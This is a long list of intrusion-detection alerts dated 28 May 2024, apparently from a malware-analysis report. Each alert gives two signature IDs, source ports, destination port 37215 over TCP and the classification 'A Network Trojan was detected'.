          Timestamp:05/28/24-14:47:28.434883
          SID:2829579
          Source Port:44006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.402127
          SID:2829579
          Source Port:59020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.213991
          SID:2835222
          Source Port:49894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.474657
          SID:2835222
          Source Port:52676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.126479
          SID:2835222
          Source Port:59160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.726791
          SID:2835222
          Source Port:41700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.560905
          SID:2835222
          Source Port:35680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.278150
          SID:2829579
          Source Port:54662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.270967
          SID:2829579
          Source Port:52526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272693
          SID:2829579
          Source Port:58352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.556722
          SID:2829579
          Source Port:45276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.949768
          SID:2829579
          Source Port:42588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.592239
          SID:2835222
          Source Port:34584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.736820
          SID:2829579
          Source Port:46040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.864215
          SID:2835222
          Source Port:53232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.151871
          SID:2829579
          Source Port:39440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.105982
          SID:2829579
          Source Port:35282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.170329
          SID:2835222
          Source Port:37576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.529055
          SID:2835222
          Source Port:49644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291552
          SID:2829579
          Source Port:38638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.048534
          SID:2835222
          Source Port:41904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291649
          SID:2835222
          Source Port:54512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.010902
          SID:2835222
          Source Port:50196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.916687
          SID:2829579
          Source Port:56496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797817
          SID:2829579
          Source Port:50332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.689519
          SID:2829579
          Source Port:44684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.416338
          SID:2835222
          Source Port:47648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.216724
          SID:2835222
          Source Port:50320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.222782
          SID:2835222
          Source Port:54618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.485350
          SID:2829579
          Source Port:46166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466461
          SID:2835222
          Source Port:46850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.602694
          SID:2835222
          Source Port:36362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196809
          SID:2835222
          Source Port:48986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.665393
          SID:2829579
          Source Port:43984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594980
          SID:2835222
          Source Port:44444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.653061
          SID:2835222
          Source Port:34720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.907855
          SID:2835222
          Source Port:55304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.774203
          SID:2835222
          Source Port:45494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.939301
          SID:2829579
          Source Port:36028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.316616
          SID:2829579
          Source Port:52670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.553370
          SID:2835222
          Source Port:43524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178415
          SID:2835222
          Source Port:47404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.243228
          SID:2829579
          Source Port:50226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.681494
          SID:2835222
          Source Port:35144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.225787
          SID:2835222
          Source Port:33980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.593148
          SID:2835222
          Source Port:52244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.321010
          SID:2829579
          Source Port:38064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.077628
          SID:2829579
          Source Port:54158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.960269
          SID:2829579
          Source Port:57600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.689147
          SID:2829579
          Source Port:54600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.949426
          SID:2829579
          Source Port:36070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.547472
          SID:2829579
          Source Port:47836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.989675
          SID:2835222
          Source Port:49550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.480944
          SID:2829579
          Source Port:52806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291778
          SID:2829579
          Source Port:35724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326777
          SID:2829579
          Source Port:37640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.313320
          SID:2835222
          Source Port:50028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.176027
          SID:2829579
          Source Port:39920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.248054
          SID:2829579
          Source Port:50222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.355797
          SID:2829579
          Source Port:54522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.649832
          SID:2829579
          Source Port:40394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.707586
          SID:2829579
          Source Port:36718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.774502
          SID:2835222
          Source Port:33548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.042478
          SID:2835222
          Source Port:42424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.481347
          SID:2835222
          Source Port:54748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.756390
          SID:2829579
          Source Port:47010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.650976
          SID:2835222
          Source Port:39386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.217770
          SID:2829579
          Source Port:52262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.668229
          SID:2829579
          Source Port:37192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.297460
          SID:2829579
          Source Port:51148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.430156
          SID:2829579
          Source Port:42356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.285977
          SID:2829579
          Source Port:34180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.889832
          SID:2835222
          Source Port:56162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298516
          SID:2829579
          Source Port:47818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.739926
          SID:2829579
          Source Port:45124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.243003
          SID:2829579
          Source Port:57956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.651397
          SID:2835222
          Source Port:35590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.992869
          SID:2835222
          Source Port:45850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.045929
          SID:2829579
          Source Port:44976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.996676
          SID:2829579
          Source Port:54304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797200
          SID:2829579
          Source Port:58720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.000696
          SID:2829579
          Source Port:48070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.961754
          SID:2829579
          Source Port:53744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322060
          SID:2835222
          Source Port:58182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.178885
          SID:2829579
          Source Port:35702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.197995
          SID:2835222
          Source Port:51228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.796936
          SID:2835222
          Source Port:38822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.329031
          SID:2835222
          Source Port:35676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.537902
          SID:2829579
          Source Port:37988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.295230
          SID:2829579
          Source Port:49848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.860361
          SID:2835222
          Source Port:45500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.728048
          SID:2829579
          Source Port:48164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.150760
          SID:2835222
          Source Port:51408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.887831
          SID:2835222
          Source Port:40444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.806203
          SID:2835222
          Source Port:57286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.268210
          SID:2835222
          Source Port:56534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551594
          SID:2829579
          Source Port:57830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.476636
          SID:2829579
          Source Port:39034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.542807
          SID:2829579
          Source Port:36338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.529946
          SID:2829579
          Source Port:60726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.744802
          SID:2835222
          Source Port:32958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.237196
          SID:2835222
          Source Port:60878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.116862
          SID:2835222
          Source Port:35256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267688
          SID:2829579
          Source Port:45176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.191852
          SID:2835222
          Source Port:43284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530240
          SID:2835222
          Source Port:35262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.781233
          SID:2829579
          Source Port:46776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.611858
          SID:2835222
          Source Port:48470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322181
          SID:2829579
          Source Port:46864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.592053
          SID:2835222
          Source Port:53818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.807287
          SID:2835222
          Source Port:45526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.920194
          SID:2835222
          Source Port:60384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.063880
          SID:2835222
          Source Port:36530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.301211
          SID:2829579
          Source Port:49018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.474458
          SID:2835222
          Source Port:37686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.159155
          SID:2835222
          Source Port:40150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.793333
          SID:2829579
          Source Port:58076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.732820
          SID:2835222
          Source Port:46530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.145187
          SID:2829579
          Source Port:41420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.951954
          SID:2835222
          Source Port:58856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272324
          SID:2829579
          Source Port:36870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.818830
          SID:2835222
          Source Port:41532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.146032
          SID:2829579
          Source Port:55742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.154167
          SID:2829579
          Source Port:38372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.212661
          SID:2835222
          Source Port:38998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.590905
          SID:2829579
          Source Port:33672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401494
          SID:2829579
          Source Port:37376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.602449
          SID:2835222
          Source Port:43636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.666244
          SID:2829579
          Source Port:44488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.739585
          SID:2835222
          Source Port:59026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.803322
          SID:2835222
          Source Port:54658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.039872
          SID:2835222
          Source Port:38462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.989108
          SID:2829579
          Source Port:43038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.482969
          SID:2835222
          Source Port:52658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.709041
          SID:2835222
          Source Port:49888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.247145
          SID:2829579
          Source Port:32940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.593259
          SID:2829579
          Source Port:51588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.269612
          SID:2829579
          Source Port:47198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497552
          SID:2829579
          Source Port:60746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.176708
          SID:2829579
          Source Port:58058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.861134
          SID:2835222
          Source Port:54300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102812
          SID:2829579
          Source Port:33028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.227944
          SID:2829579
          Source Port:58600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214281
          SID:2835222
          Source Port:50950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.729325
          SID:2829579
          Source Port:40622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922009
          SID:2829579
          Source Port:60972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.216362
          SID:2835222
          Source Port:40274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.547509
          SID:2829579
          Source Port:36362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.803154
          SID:2829579
          Source Port:58056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.154139
          SID:2829579
          Source Port:35626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.185865
          SID:2835222
          Source Port:50662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.979069
          SID:2829579
          Source Port:40270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.864507
          SID:2829579
          Source Port:54896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.147496
          SID:2829579
          Source Port:51830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.725115
          SID:2829579
          Source Port:36410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652908
          SID:2829579
          Source Port:36284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.127421
          SID:2835222
          Source Port:46340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.175499
          SID:2829579
          Source Port:35498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.960726
          SID:2835222
          Source Port:39596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.062832
          SID:2835222
          Source Port:56810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.416040
          SID:2835222
          Source Port:53568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.267084
          SID:2835222
          Source Port:37662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401294
          SID:2835222
          Source Port:48270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.625608
          SID:2835222
          Source Port:45666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922632
          SID:2829579
          Source Port:56368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.144113
          SID:2829579
          Source Port:59046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.112766
          SID:2829579
          Source Port:57030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.355703
          SID:2829579
          Source Port:58622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.796024
          SID:2829579
          Source Port:59560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.221273
          SID:2829579
          Source Port:35900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.228289
          SID:2829579
          Source Port:35778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.305551
          SID:2829579
          Source Port:45338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.977708
          SID:2829579
          Source Port:53516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.656269
          SID:2829579
          Source Port:41194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.920097
          SID:2829579
          Source Port:53284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.269152
          SID:2829579
          Source Port:34268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.818263
          SID:2835222
          Source Port:51298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.379161
          SID:2835222
          Source Port:60814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.044153
          SID:2835222
          Source Port:50066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.855969
          SID:2829579
          Source Port:56792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878887
          SID:2829579
          Source Port:49242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102820
          SID:2829579
          Source Port:57218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.350274
          SID:2829579
          Source Port:59220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326744
          SID:2829579
          Source Port:37894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.051162
          SID:2835222
          Source Port:34644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.226488
          SID:2835222
          Source Port:44854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.321044
          SID:2829579
          Source Port:60508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.330083
          SID:2829579
          Source Port:52712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.280371
          SID:2829579
          Source Port:53280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.985182
          SID:2829579
          Source Port:55242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272247
          SID:2829579
          Source Port:56510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.953337
          SID:2829579
          Source Port:52650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.296073
          SID:2835222
          Source Port:51438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.473556
          SID:2835222
          Source Port:59152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.733179
          SID:2835222
          Source Port:55744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941549
          SID:2829579
          Source Port:50684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.486492
          SID:2829579
          Source Port:45078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324076
